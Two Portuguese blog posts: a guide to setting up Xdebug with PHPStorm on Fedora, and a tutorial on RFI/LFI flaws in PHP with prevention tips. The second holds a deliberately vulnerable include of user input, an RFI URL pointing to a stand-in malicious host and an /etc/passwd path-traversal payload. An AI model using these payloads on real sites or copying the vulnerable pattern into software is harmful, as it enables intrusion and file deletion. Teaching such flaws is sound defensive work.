Fiz esse procedimento usando o Fedora Workstation 25.

[wp_ad_camp_3]

Instalando o XDEBUG

Primeiro você deve acessar o seu terminal, e executar o comando abaixo como super usuário, no caso do fedora basta digitar o sudo antes do comando para se elevar com direitos administrativos no sistema operacional.

$ sudo dnf install php-xdebug

Pronto, após a execução do comando acima você já deve ter o XDEBUG instalado.

Configurando o XDEBUG no php.ini

[wp_ad_camp_1]

Primeiro passo é saber onde está o seu php.ini, para isso crie um arquivo teste.php com o conteúdo abaixo:

<?php

echo phpinfo();

Acesse pelo navegador, e localize a linha abaixo:

No caso o arquivo do xdebug encontra-se em /etc/php.d/15-xdebug.ini vamos editar ele e realizar as configurações necessárias.

Ao abrir o arquivo você provavelmente vai encontrar o conteúdo “zend_extension=xdebug.so”, acima dele adicione “[xDebug]” e abaixo as configurações para fazer o phpstorm funcionar com ele:

[xdebug]
zend_extension=xdebug.so
xdebug.default_enable=1
xdebug.idekey=PHPSTORM
xdebug.remote_enable=1
xdebug.remote_autostart=1
xdebug.remote_port=9000
xdebug.remote_connect_back=1

Após isso reinicie o seu servidor http, no caso do Fedora estou usando o apache. Para reiniciar basta digitar o comando abaixo:

sudo service httpd restart

Testando no phpStorm

[wp_ad_camp_2]

Para testar no phpstorm, crie um arquivo teste.php faça alguma operação nele, coloque um breakpoint. Clique sobre o listener () e assim que ele ficar verde pode executar sua aplicação pelo navegador.

Pronto, XDEBUG instalado e pronto para uso pessoal.

Links úteis:

XDebug: https://www.xdebug.org

PHPStorm: https://www.jetbrains.com/phpstorm

Fedora WorkStation: https://getfedora.org/pt_BR/workstation/

The post Configurar o XDEBUG no Linux usando o PHPStorm appeared first on Hiago Silva Souza.

RFI/LFI, do inglês (Remote/Local File Include) é um tipo de vulnerabilidade de segurança para páginas na internet. Essa vulnerabilidade pode ser usada para explorar, interromper e até obter dados usando um serviço na internet, uma vez que o mesmo interprete a inclusão do código a partir de uma informação enviada pelo cliente diretamente para a aplicação.

O Ataque!

[wp_ad_camp_1]

O ataque ocorre quando o desenvolvedor faz a inclusão de arquivos, baseado em entradas dos usuários. Vamos colocar como exemplo, um formulário para selecionar o idioma de uma página:

pagina.php

<?php
   if(isset($_GET['idioma'))
        require_once($_GET['idioma']);
?>

<form method="GET">
     <select name="idioma">
          <option value="portugues.php">Português</option>
          <option value="ingles.php">Inglês</option>
     </select>
</form>

Agora o php inclui um arquivo baseado na entrada do usuário, vamos ver alguns exemplos de entradas que poderiam causar dor de cabeça:

Exemplo de RFI (chamando um arquivo remoto…)

pagina.php?idioma=http://malvado.exemplo.com.br/script-php-do-mal.txt?. Agora imagine que o script-php-do-mal.txt contenha o seguinte conteúdo “@unlink(__DIR__ . ‘/pagina.php’);” pronto você acaba de perder seu script!

Exemplo de LFI (Chamando um arquivo local…)

pagina.php?idioma=../../../../../etc/passwd%00?. Você acaba de listar a senha de seus usuários UNIX online!

Observação: Os exemplos acima são muitos comuns, e muitos provedores de hospedagem bloqueiam o acesso aos arquivos/url externas como citados nos exemplos. Os exemplos citados foram usados somente para mostrar possibilidades para exploração das falhas.

Como se prevenir:

[wp_ad_camp_2]

Caso você não seja o desenvolvedor e queira fazer uma precaução via servidor, você pode estar trabalhando com as configurações do PHP (ou do interpretador/linguagem que estiver usando), para isso desabilite a inclusão de URL’s no seu php.ini, para isso basta modificar o valor de allow_url_include para Off. No caso de LFI, o correto é o tratamento no próprio script (não fazendo uso de inclusões baseadas em informações de usuários), mas você pode se prevenir fazendo bom uso dos direitos que o próprio sistema operacional lhe oferece.

Obrigado!

Espero que com esse POST eu tenha contribuído para que vocês melhorem a segurança em suas aplicações.

The post Segurança: O que é RFI / LFI? appeared first on Hiago Silva Souza.